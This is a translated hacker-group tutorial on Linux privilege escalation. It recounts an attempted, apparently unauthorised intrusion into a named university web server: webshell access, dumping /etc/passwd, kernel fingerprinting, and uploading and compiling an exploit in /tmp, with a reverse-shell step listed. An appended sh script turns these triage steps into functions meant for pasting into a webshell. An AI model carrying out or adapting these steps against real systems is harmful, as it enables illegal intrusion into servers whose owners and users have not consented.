Linux Penetration and Security, Section 3: Privilege Escalation

Source: Internet
Author: User

Some people have always regarded privilege escalation on Linux as an advanced technique. In fact, there is nothing mysterious about it. The process boils down to five steps:
1. Obtain a webshell.
2. Confirm that you can execute commands, and obtain the Linux distribution and kernel version.
3. Upload the privilege escalation exploit matching that version to a directory that is writable and allows execution.
4. Run the exploit and a reverse-connection (bounce) script.
5. Control the machine remotely from the command line.
Author: YoCo Smart
From: Silic Group Hacker Army
Http://blackbap.org
The example in this article is again the server of the Hiroshima University institute. So far I have not managed to escalate privileges on it, so this is not a successful example; but the purpose of this article is to explain the process rather than the result.
The institute's web server environment is:
CentOS + PHP + Apache + PostgreSQL
This is not important in itself. I have a webshell, and I found that the PHP exec and system functions are available.
First, read the password file: cat /etc/passwd

Output:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
messages:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ope:x:500:500::/home/ope:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
Besides root, the accounts with a bash login shell are:
the database account, postgres (line 32);
the administrator's account, ope (line 36).
apache has /sbin/nologin as its shell. That does not affect anything here; it is just worth noting.
Incidentally, w shows one logged-in user:

10:45:41 up 71 days, 1 user, load average: 2.00, 2.00, 2.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ope tty1 - 26Jan11 71days 0.03s 0.03s -bash

Now down to business.
Run the command: uname -a

Output:

Linux XXXXXXXX.hiroshima-u.ac.jp 2.6.18-164.15.1.el5PAE #1 SMP Wed Mar 17 12:14:29 EDT 2010 i686 i686 i386 GNU/Linux

The kernel is 2.6.18. Now look at lsb_release -a.

Output:

LSB Version: core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID: CentOS
Description: CentOS release 5.4 (Final)
Release: 5.4
Codename: Final
So it is indeed CentOS 5.4 with the 2.6.18 kernel. I have not found a known vulnerability in this Red Hat-based system, but let's try anyway.
Upload last year's privilege escalation exploit for 2.6.18 to the /tmp directory.
Note: exploits are generally placed in /tmp. The reason is simple: the directory is world-writable and normally allows execution (check the mount options, though; a /tmp mounted noexec will not run an uploaded binary). File name: 2618.c
Before escalating: this is a C source file, so unlike a .rb or .pl script it cannot be run directly. It has to be compiled first: gcc -o /tmp/2618 /tmp/2618.c
This compiles /tmp/2618.c into the executable /tmp/2618.
Now run the file directly: /tmp/2618
The output shows that it failed:

Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.
(See http://www.ksplice.com/uptrack/cve-2010-3081)

$ Kernel release: 2.6.18-164.15.1.el5PAE
$ Backdoor in LSM (1/3): checking... not present.
$ Backdoor in timer_list_fops (2/3): not available.
$ Backdoor in IDT (3/3): checking... not present.

Your system is free from the backdoors that would be left in memory
by the published exploit for CVE-2010-3081.


Note what the banner above says: the file compiled and run as 2618.c is not an exploit at all but Ksplice's diagnostic tool for CVE-2010-3081, which only checks memory for the backdoors that the published exploit leaves behind. It never attempts escalation. CVE-2010-3081 is also a 64-bit (x86_64) kernel bug in the 32-bit compat layer, while uname reported i686 here, so that exploit would not apply to this machine in any case.
In general, going straight for the kernel on a Red Hat-derived system is not wise: Red Hat backports fixes, so the 2.6.18 base version says little about which bugs remain. My plan is instead to look for vulnerable software and drivers on the system and use those to escalate. Unfortunately I have not succeeded yet.
Conclusion: two points to note about privilege escalation exploits. If gcc fails to compile the exploit, the problem may be in the C source itself. If the target has no gcc, or cannot produce an executable, compile the exploit locally or on another machine with the same architecture and libc, then transfer the binary and execute it.
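The triage steps of this article (which accounts can log in, what the kernel string really says, whether the upload directory will execute a binary, and what to do when gcc is missing) as POSIX sh functions. This is an added example, not code from the original article or its author; the SAMPLE_* values are constructed so it runs offline, and the function names are my own. On a real target you would feed the functions /etc/passwd, uname -r and /proc/mounts instead.

```sh
#!/bin/sh
# Added example, not from the original article. Re-implements the article's
# triage steps as POSIX sh functions that can be pasted into a webshell
# session. SAMPLE_* values are constructed for offline use.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
apache:x:48:48:Apache:/var/www:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ope:x:500:500::/home/ope:/bin/bash'

SAMPLE_UNAME_R='2.6.18-164.15.1.el5PAE'

SAMPLE_MOUNTS='/dev/sda1 / ext3 rw,data=ordered 0 0
tmpfs /tmp tmpfs rw,noexec,nosuid,nodev 0 0
/dev/sda2 /var ext3 rw 0 0'

# Print "name uid shell" for each passwd line on stdin whose login shell is
# an interactive shell. /bin/sync, /sbin/halt and nologin are skipped, which
# reproduces the article's reading: root, postgres and ope.
login_shells() {
    awk -F: '$7 ~ /\/(sh|bash|dash|ksh|zsh)$/ { printf "%s %s %s\n", $1, $3, $7 }'
}

# Upstream base version ("2.6.18") of a RHEL-style kernel release string.
kernel_base() {
    printf '%s\n' "$1" | sed 's/-.*//'
}

# Vendor package release ("164.15.1"). On RHEL/CentOS this, not the
# 2.6.18 base, is what tells you which fixes have been backported.
kernel_pkg_release() {
    printf '%s\n' "$1" | sed -e 's/^[^-]*-//' -e 's/\.el[0-9].*//'
}

# Exit 0 when the mount holding directory $1 carries the noexec option.
# Reads /proc/mounts format on stdin and picks the longest matching mount
# point ("/tm" must not match "/tmp").
mount_noexec() {
    awk -v d="$1" '
        index(d, $2) == 1 &&
        ($2 == "/" || length(d) == length($2) || substr(d, length($2) + 1, 1) == "/") &&
        length($2) > length(best) { best = $2; opts = $4 }
        END { if (("," opts ",") ~ /,noexec,/) exit 0; exit 1 }'
}

# Is $1 usable for the article's "upload to /tmp and run it" step?
# Needs: directory exists, is writable by us, and is not on a noexec mount.
upload_dir_ok() {
    dir=$1
    [ -d "$dir" ] && [ -w "$dir" ] || return 1
    if [ -r /proc/mounts ] && mount_noexec "$dir" < /proc/mounts; then
        return 1
    fi
    return 0
}

# Compile a C exploit in place when gcc is present; otherwise say what to
# build elsewhere. Static linking avoids libc mismatches when the binary is
# built on another host, as the article's conclusion suggests.
build_or_advise() {
    src=$1; out=$2; arch=$3
    if command -v gcc >/dev/null 2>&1; then
        gcc -o "$out" "$src" && echo "built $out"
    else
        echo "no gcc here: on a $arch box run: gcc -static -o $(basename "$out") $(basename "$src"), then upload $(basename "$out")"
        return 2
    fi
}

# Demo on the constructed samples.
printf '%s\n' "$SAMPLE_PASSWD" | login_shells
echo "base=$(kernel_base "$SAMPLE_UNAME_R") pkg=$(kernel_pkg_release "$SAMPLE_UNAME_R")"
if printf '%s\n' "$SAMPLE_MOUNTS" | mount_noexec /tmp; then
    echo "sample /tmp is noexec: a compiled exploit would not run from there"
fi
```

The sample mounts table deliberately has /tmp mounted noexec, the case the article's "upload to /tmp" advice glosses over; on such a host an uploaded binary fails with "Permission denied" no matter how it was compiled, and another writable location (or a /dev/shm that is not noexec) has to be found.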
